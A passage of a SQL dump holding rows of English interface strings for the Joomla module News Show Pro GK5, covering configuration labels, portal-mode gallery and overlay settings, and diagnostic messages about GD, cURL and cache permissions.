Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2953,'MOD_NEWS_PRO_GK5_LINE_INFO_LAYOUT','Information block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2954,'MOD_NEWS_PRO_GK5_LINE_INFO_LAYOUT_DESC','Options connected with the Information block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2955,'MOD_NEWS_PRO_GK5_LINE_ARTICLE_PAGINATION','Article pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2956,'MOD_NEWS_PRO_GK5_LINE_ARTICLE_PAGINATION_DESC','Options connected with the Article pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2957,'COM_MODULES_NSP_ABOUT_US_FIELDSET_LABEL','About','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2958,'MOD_NEWS_PRO_GK5_ABOUT_US_CONTENT','<div style=\'color: #555; line-height: 18px; font-size: 12px; padding: 20px 0 0\'><p><strong>Author:</strong></p>News Show Pro GK5 is developed by <a href=\'http://www.gavick.com\' target=\'_blank\' style=\'color: #ef6b09\'>GavickPro</a>. Since 2007 we have been focusing on creating <a href=\'https://www.gavick.com/joomla-templates.html\' target=\'_blank\' style=\'color: #ef6b09\'>Joomla Templates</a> up to the minute in order to fulfill your expectations. Additionally, we provide you with <a href=\'http://www.gavick.com/free-joomla-modules.html\' target=\'_blank\' style=\'color: #ef6b09\'>free extensions</a>, modules and you can also visit our <a href=\'http://www.gavick.com/magazine\' target=\'_blank\' style=\'color: #ef6b09\'>Gavick Blog</a> where it is possible for you to get some useful information connected with services provided and how to avoid some possible problems.<p style=\'font-size: 11px; text-align: center;margin: 60px -10px 0; border-top: 1px solid #eee; padding: 6px 0\'>News Show Pro GK5 is released under the <a href=\'http://www.gnu.org/licenses/gpl-2.0.html\' target=\'_blank\' style=\'color: #ef6b09\'>GNU/GPL v2 license.</a></p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2959,'MOD_NEWS_PRO_GK5_CONFIG_LOADED_AND_SAVED','Configuration successfully loaded and saved!','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2960,'MOD_NEWS_PRO_GK5_CONFIG_SQL_ERROR','An error occurred during saving the configuration','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2961,'MOD_NEWS_PRO_GK5_CONFIG_SELECTED_FILE_DOESNT_EXIST','Selected file doesn\'t exist','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2962,'MOD_NEWS_PRO_GK5_CONFIG_FILE_SAVED_AS','Configuration file saved as ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2963,'MOD_NEWS_PRO_GK5_CONFIG_FILE_WASNT_SAVED_PLEASE_CHECK_PERM','Configuration file wasn\'t saved. Please check the config directory permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2964,'MOD_NEWS_PRO_GK5_CONFIG_LOAD','Load configuration:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2965,'MOD_NEWS_PRO_GK5_CONFIG_LOAD_BTN','Load','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2966,'MOD_NEWS_PRO_GK5_CONFIG_SAVE','Save configuration:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2967,'MOD_NEWS_PRO_GK5_CONFIG_SAVE_BTN','Save','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2968,'MOD_NEWS_PRO_GK5_CONFIG_DIRECTORY','Config Directory:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2969,'MOD_NEWS_PRO_GK5_CONFIG_DELETE','Delete Configuration:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2970,'MOD_NEWS_PRO_GK5_CONFIG_DELETE_BTN','Delete','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2971,'MOD_NEWS_PRO_GK5_CONFIG_FILE_DELETED_AS',' configuration file deleted successfully.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2972,'MOD_NEWS_PRO_GK5_CONFIG_FILE_WASNT_DELETED_PLEASE_CHECK_PERM',' configuration file wasn\'t deleted properly. Please check the config directory for file permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2973,'MOD_NEWS_PRO_GK5_CONFIG_FILE_WASNT_DELETED_PLEASE_CHECK_FILE',' selected configuration file is not available. Please check the config directory.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2974,'MOD_NEWS_PRO_GK5_ENGINE_MODE','Used JavaScript framework','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2975,'MOD_NEWS_PRO_GK5_ENGINE_MODE_DESC','Select which JavaScript framework to be used.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2976,'MOD_NEWS_PRO_GK5_MODE_MOOTOOLS','MooTools','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2977,'MOD_NEWS_PRO_GK5_MODE_JQUERY','jQuery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2978,'MOD_NEWS_PRO_GK5_INCLUDE_JQUERY','Include jQuery framework','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2979,'MOD_NEWS_PRO_GK5_INCLUDE_JQUERY_DESC','Force loading of the jQuery framework by the module if the current template does not contain it.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2980,'MOD_NEWS_PRO_GK5_PROBLEM_GD_LIB','<h3>GD library not installed</h3><p>The GD library is responsible for creating image thumbnails - without this library the thumbnails won\\\'t be created. Instead of thumbnails the module will use original images resized by browser - it can impact your page loading speed.</p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2981,'MOD_NEWS_PRO_GK5_PROBLEM_CURL','<h3>cURL library not installed</h3><p>The cURL library is responsible for downloading external images or images with the absolute path in the article content. Without it the module won\\\'t display the external images or images with the absolute path as the article image in the generated content.</p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2982,'MOD_NEWS_PRO_GK5_PROBLEM_CACHE_DIR','<h3>The cache directory is not writable</h3><p>The cache directory stores all thumbnails generated by GD library. If it is unwritable then the generated thumbnails cannot be stored and module can return blank images</p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2983,'MOD_NEWS_PRO_GK5_PROBLEM_CACHE_TIME','<h3>Cache time can be too short</h3><p>The specified cache time (<= 5min) can be too short and can cause slower page loading time due bigger CPU usage on the thumbnail creation.</p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2984,'MOD_NEWS_PRO_GK5_NO_PROBLEMS_DETECTED','<h3>All is configured properly</h3><p>Your GD library configuration, cURL library configuration and cache directory permissions are proper.</p>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2985,'COM_MODULES_NSP_PORTAL_MODE_NEWS_GALLERY_FIELDSET_LABEL','News Gallery - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2986,'MOD_NEWS_PRO_GK5_NEWS_GALLERY','News Gallery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2987,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AMOUNT','Amount of news','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2988,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AMOUNT_DESC','This option specify amount of news displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2989,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2990,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2991,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_PAGINATION_TYPE','Pagination type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2992,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_PAGINATION_TYPE_DESC','You can select the pagination type used in this portal mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2993,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AUTOANIMATION','Autoanimation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2994,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AUTOANIMATION_DESC','You can enable or disable autoanimation of the news in the portal mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2995,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AUTOANIMATION_TIME','Autoanimation interval (ms)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2996,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_GALLERY_AUTOANIMATION_TIME_DESC','Autoanimation interval in miliseconds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2997,'COM_MODULES_NSP_PORTAL_MODE_PRODUCT_GALLERY_FIELDSET_LABEL','Product Gallery - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2998,'MOD_NEWS_PRO_GK5_PRODUCT_GALLERY','Product Gallery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2999,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AMOUNT','Amount of news','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3000,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AMOUNT_DESC','This option specify amount of news displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3001,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3002,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3003,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AUTOANIMATION','Autoanimation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3004,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AUTOANIMATION_DESC','You can enable or disable autoanimation of the news in the portal mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3005,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AUTOANIMATION_TIME','Autoanimation interval (ms)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3006,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_AUTOANIMATION_TIME_DESC','Autoanimation interval in miliseconds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3007,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_NAV','Pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3008,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_NAV_DESC','This option enable/disable module pagination arrows.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3009,'MOD_NEWS_PRO_GK5_NSP_MORE_DETAILS','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3010,'COM_MODULES_NSP_PORTAL_MODE_PRODUCT_GALLERY_2_FIELDSET_LABEL','Product Gallery II - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3011,'MOD_NEWS_PRO_GK5_PRODUCT_GALLERY_2','Product Gallery II','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3012,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3013,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_ROWS_DESC','This option specify amount of news rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3014,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3015,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3016,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_BUTTON','Button type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3017,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_BUTTON_DESC','This option specify the type of button.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3018,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_CART','Add to cart','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3019,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_READON','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3020,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PRODUCT_GALLERY_2_READON_TEXT','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3021,'COM_MODULES_NSP_PORTAL_MODE_NEWS_BLOCKS_FIELDSET_LABEL','News Blocks - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3022,'MOD_NEWS_PRO_GK5_NEWS_BLOCKS','News Blocks','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3023,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_BLOCKS_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3024,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_BLOCKS_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3025,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_BLOCKS_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3026,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_BLOCKS_ROWS_DESC','This option specify amount of news rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3027,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_BLOCKS_MORE','More details','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3028,'COM_MODULES_NSP_PORTAL_MODE_TITLE_OVERLAY_FIELDSET_LABEL','Title Overlay - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3029,'MOD_NEWS_PRO_GK5_TITLE_OVERLAY','Title Overlay','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3030,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_POS','Text block position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3031,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_POS_DESC','You can specify the position of the text block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3032,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_PADDING','Text block padding','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3033,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_PADDING_DESC','You can specify the text block padding as a CSS padding property value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3034,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_BG','Text block background','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3035,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_BG_DESC','You can specify the text block background color as a CSS background property value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3036,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_WIDTH','Text block width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3037,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TEXT_WIDTH_DESC','You can specify the text block width in percents','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3038,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_TOP','Top','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3039,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TITLE_OVERLAY_BOTTOM','Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3040,'COM_MODULES_NSP_PORTAL_MODE_PORTFOLIO_FIELDSET_LABEL','Portfolio - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3041,'MOD_NEWS_PRO_GK5_PORTFOLIO','Portfolio','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3042,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3043,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_COLS_DESC','This option specify amount of news columns displayed in the portal mode per page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3044,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3045,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_ROWS_DESC','This option specify amount of news rows displayed in the portal mode per page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3046,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_PAGES','Amount of pages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3047,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_PAGES_DESC','This option specify amount of pages displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3048,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK','Link at the bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3049,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK_DESC','If you have one page you can disable link at the bottom totally or hide the bottom button after loading all pages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3050,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK_URL','URL for the link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3051,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK_URL_DESC','This option specify the link displayed at the bottom after loading all items.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3052,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK_TEXT1','More work','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3053,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_LINK_TEXT2','See more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3054,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_INITIAL_ANIM','Creativity initial anim','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3055,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_INITIAL_ANIM_DESC','Enable this option only on the Creativity template!','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3056,'COM_MODULES_NSP_PORTAL_MODE_CENTERED_TITLE_OVERLAY_FIELDSET_LABEL','Centered Title Overlay - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3057,'MOD_NEWS_PRO_GK5_CENTERED_TITLE_OVERLAY','Centered Title Overlay','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3058,'MOD_NEWS_PRO_GK5_PORTAL_MODE_CENTERED_TITLE_OVERLAY_TEXT_BG','Text block background','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3059,'MOD_NEWS_PRO_GK5_PORTAL_MODE_CENTERED_TITLE_OVERLAY_TEXT_BG_DESC','You can specify the text block background color as a CSS background property value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3060,'COM_MODULES_NSP_PORTAL_MODE_GRID_TITLE_OVERLAY_FIELDSET_LABEL','Grid Title Overlay - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3061,'MOD_NEWS_PRO_GK5_GRID_TITLE_OVERLAY','Grid Title Overlay','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3062,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_POS','Text block position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3063,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_POS_DESC','You can specify the position of the text block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3064,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_PADDING','Text block padding','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3065,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_PADDING_DESC','You can specify the text block padding as a CSS padding property value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3066,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_NONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3067,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TOP','Top','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3068,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_BOTTOM','Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3069,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_COLOR','Text color','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3070,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_TEXT_COLOR_DESC','You can select dark or light color for the text in the module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3071,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_DARK','Dark','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3072,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_TITLE_OVERLAY_LIGHT','Light','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3073,'COM_MODULES_NSP_PORTAL_MODE_HIGHLIGHTS_FIELDSET_LABEL','Highlights - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3074,'MOD_NEWS_PRO_GK5_HIGHLIGHTS','Highlights','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3075,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_READMORE','Read more link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3076,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_READMORE_DESC','Read more link value, leave it blank if you want to hide this button','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3077,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_READMORE_VALUE','More…','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3078,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_AMOUNT','Amount of articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3079,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_AMOUNT_DESC','Displayed amount of articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3080,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_DATE_FORMAT','Date format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3081,'MOD_NEWS_PRO_GK5_PORTAL_MODE_HIGHLIGHTS_DATE_FORMAT_DESC','Works like the date format in the block. Leave it blank to hide the date block.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3082,'NSP_PORTAL_MODE_HIGHLIGHTS_TITLE_LIMIT','Title length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3083,'NSP_PORTAL_MODE_HIGHLIGHTS_TITLE_LIMIT_TYPE','Type of title limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3084,'COM_MODULES_NSP_PORTAL_MODE_VIDEOGALLERY_FIELDSET_LABEL','Video Gallery - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3085,'MOD_NEWS_PRO_GK5_VIDEOGALLERY','Video Gallery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3086,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_GALLERY_POPUP','Video popup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3087,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_GALLERY_POPUP_DESC','You can disable the video popup which is displayed when article contains a video in K2 component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3088,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_GALLERY_POPUP_X','Popup width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3089,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_GALLERY_POPUP_Y','Popup height','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3090,'NSP_PORTAL_MODE_VIDEO_GALLERY_PAGES','Amount of pages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3091,'NSP_PORTAL_MODE_VIDEO_GALLERY_PAGES_DESC','Amount of pages with articles. When bigger than 1 - then the auto-animation will be automatically enabled.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3092,'NSP_PORTAL_MODE_VIDEO_GALLERY_PER_PAGE','Articles per page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3093,'NSP_PORTAL_MODE_VIDEO_GALLERY_PER_PAGE_DESC','Amount of articles displayed on one 